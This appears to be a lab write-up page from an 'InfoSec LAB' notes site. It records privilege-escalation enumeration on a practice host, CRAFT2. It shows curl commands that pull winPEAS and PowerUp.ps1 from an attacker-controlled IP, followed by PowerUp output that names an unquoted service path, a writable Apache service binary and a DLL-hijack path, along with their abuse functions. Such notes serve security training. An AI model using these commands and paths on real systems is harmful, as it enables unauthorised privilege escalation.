PEAS

Conducting an automated enumeration after performing a manual enumeration on the CRAFT2 host.

PS C:\xampp\htdocs> curl http://192.168.45.158/winPEASany.exe -OutFile .\winPEASany.exe

Delivery complete

Executing PEAS

ENV

����������͹ User Environment Variables
� Check for some passwords or keys in the env variables 
    COMPUTERNAME: CRAFT2
    USERPROFILE: C:\Users\apache
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\apache\AppData\Local
    PSModulePath: C:\Users\apache\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\apache\AppData\Local\Microsoft\WindowsApps
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    PSExecutionPolicyPreference: Bypass
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    AP_PARENT_PID: 2196
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 0101
    USERNAME: apache
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\Windows\system32\cmd.exe
    PROMPT: $P$G
    SystemDrive: C:
    TEMP: C:\Users\apache\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 2
    APPDATA: C:\Users\apache\AppData\Roaming
    TMP: C:\Users\apache\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: CRAFT2
 
����������͹ System Environment Variables
� Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

N/A

UAC

PowerShell

Events

Event log is readable

NTLM

Token Privileges (`apache`)

Enumerated

Processes

Services

ApacheHTTPServer

MySQL

ResumeService1

Modifiable

Interesting Files / Directories

PowerUp

PS C:\xampp\htdocs> curl http://192.168.45.158/PowerUp.ps1 -OutFile .\PowerUp.ps1

Delivery complete

PS C:\xampp\htdocs> Invoke-AllChecks
 
 
ServiceName    : ResumeService1
Path           : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : .\thecybergeek
AbuseFunction  : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart     : False
Name           : ResumeService1
Check          : Unquoted Service Paths
 
ServiceName    : ResumeService1
Path           : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : .\thecybergeek
AbuseFunction  : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart     : False
Name           : ResumeService1
Check          : Unquoted Service Paths
 
ServiceName                     : ApacheHTTPServer
Path                            : "C:\Xampp\apache\bin\httpd.exe" -k runservice
ModifiableFile                  : C:\Xampp\apache\bin\httpd.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : CRAFT2\apache
StartName                       : .\apache
AbuseFunction                   : Install-ServiceBinary -Name 'ApacheHTTPServer'
CanRestart                      : False
Name                            : ApacheHTTPServer
Check                           : Modifiable Service Files
 
ModifiablePath    : C:\Users\apache\AppData\Local\Microsoft\WindowsApps
IdentityReference : CRAFT2\apache
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\apache\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\apache\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\apache\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

Lateral movement to the thecybergeek user is possible by exploiting the ResumeService1 service.

InfoSec LAB

Explorer

Craft2_Automated

PEAS

ENV

N/A

UAC

PowerShell

Events

NTLM

Token Privileges (`apache`)

Processes

Services

Modifiable

Interesting Files / Directories

PowerUp

Interactive Graph View

Table of Contents

Backlinks

InfoSec LAB

Explorer

Craft2_Automated

PEAS

ENV

N/A

UAC

PowerShell

Events

NTLM

Token Privileges (apache)

Processes

Services

Modifiable

Interesting Files / Directories

PowerUp

Interactive Graph View

Table of Contents

Backlinks

Token Privileges (`apache`)